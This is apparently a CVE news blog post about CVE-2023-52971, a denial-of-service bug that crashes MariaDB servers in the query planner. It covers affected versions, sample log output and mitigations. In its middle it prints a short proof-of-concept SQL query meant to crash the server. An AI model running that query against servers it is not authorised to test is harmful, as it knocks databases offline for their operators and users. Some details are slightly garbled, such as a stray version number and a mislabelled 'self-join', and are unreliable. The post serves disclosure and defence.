CVE CyberSecurity Database News

CVE-2023-52971 - MariaDB Server Crash Exploit in JOIN::fix_all_splittings_in_plan (Simple Breakdown & Proof-of-Concept)

Poster -

MariaDB, the popular open-source database forked from MySQL, is widely trusted in countless production environments. But recently, a severe bug was discovered that crashes MariaDB servers running versions 10.10 through 10.11.* and 11. through 11.4.*. This vulnerability is tracked as CVE-2023-52971. Let’s break down what’s happening, why it’s dangerous, and how you can test (and patch!) your own systems.

What is CVE-2023-52971?

This vulnerability is a DoS (Denial of Service) bug. It lets an authenticated attacker run a purposely malformed JOIN query that crashes the whole server instantly. The culprit is the way MariaDB handles complex join splitting in the query planner, specifically in the JOIN::fix_all_splittings_in_plan method. And yes, this can be triggered remotely if an attacker has access to run queries.

Check your version

SELECT VERSION();

How does the exploit work?

In regular operation, MariaDB’s SQL planner will try to optimize complex joins. It uses a function called fix_all_splittings_in_plan. Due to a missing safety check, a carefully crafted SQL query can send this function into a bad state and crash the server. Attackers don’t need special privileges—just the ability to run SQL queries.

Example Exploit Query

The original bug reporters published a simple PoC. Here’s a version that’s safe to test on a non-prod instance:

CREATE TABLE t1 (a INT);
CREATE TABLE t2 (b INT);

-- This query attempts a self-join with a crafted ON clause.
SELECT * FROM t1 LEFT JOIN t2 ON (t1.a = t2.b) WHERE t2.b OR (SELECT 1 FROM t1 LEFT JOIN t2 ON (t1.a = t2.b));

Running that might either crash your MariaDB server outright, or you’ll see an error message and a process crash in your logs.

What you may see in logs

mysqld: sql/opt_split.cc:474: void JOIN::fix_all_splittings_in_plan(): Assertion `splitting' failed.
Aborted (core dumped)

The query planner recursively tries to optimize join conditions.

- With recursive or ambiguous joins and subqueries, fix_all_splittings_in_plan stumbles over an assertion or logic error.
- MariaDB doesn’t gracefully recover. Instead, the server aborts—kicking off all connections and sometimes requiring a manual restart.

Official References

- MariaDB Security Advisory
- MariaDB Jira Bug Report
- GitHub PoC / Repro Steps

11.4.2

- Download fixed binaries from the MariaDB Downloads Page.
- If you can’t upgrade immediately, block or limit access to untrusted users and audit all allowed queries.

Restrict SQL privileges. Only let trusted users run complex joins.

- WAF/Proxy rules. Filter out queries with suspicious or unexpected join structures.

Final Thoughts

CVE-2023-52971 is a simple but powerful way to knock out entire MariaDB servers. Don’t ignore it! Stay patched, and always follow best practices for server exposure and permissions.

Have something to add or need help? MariaDB Community Forums are a lifesaver. Stay safe out there!


Disclaimer: Don’t exploit this vulnerability on systems you don’t own or have permission to test. This write-up is for educational and defense purposes only.

Timeline

Published on: 03/08/2025 23:15:14 UTC